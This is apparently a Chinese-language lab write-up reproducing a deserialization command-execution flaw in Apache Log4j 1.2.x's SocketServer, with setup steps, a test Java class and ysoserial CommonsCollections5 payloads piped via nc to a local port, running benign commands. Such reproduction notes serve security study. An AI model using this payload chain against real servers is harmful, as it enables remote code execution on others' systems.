信息
影響版本:1.2.4 <= Apache Log4j <= 1.2.17
時間:2019.12
復現環境:
① ubuntu + jdk 1.8
或者
② windows 10 + idea +jdk 1.8
復現版本:1.2.17
類型:命令執行
下載地址:
鏈接:https://pan.baidu.com/s/1NjdKwPSJc_vKUvfeYQNCLw
提取碼:zbh6
版本探測:沒法探測
ubuntu下搭建
root@# java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 ./log4jserver.properties ./
或者利用windows的idea來搭建
1.新建maven項目
2.pom.xml添加依賴
<dependencies>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
<version>1.2.17</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>
</dependencies>
3.
新建java文件:test.java
import org.apache.log4j.Logger;
import org.apache.log4j.net.SimpleSocketServer;
public class test {
private static final Logger log = Logger.getLogger(SimpleSocketServer.class);
public static void main(String[] args) {
System.out.println("start:");
String[] argss = {"4560", "src/log4jserver.properties"};
SimpleSocketServer.main(argss);
log.info("succ");
}
}
4.log4jserver.properties放到項目的src目錄下
5.運行aaa.java,啟動log4j
攻擊
## ubuntu環境
root@# java -jar ysoserial-master.jar CommonsCollections5 "touch /tmp/suc cess" | nc 127.0.0.1 4560
## windows環境
root@# java -jar ysoserial-master.jar CommonsCollections5 "calc.exe" | nc 127.0.0.1 4560
總結
雞肋漏洞,建議不要復現了
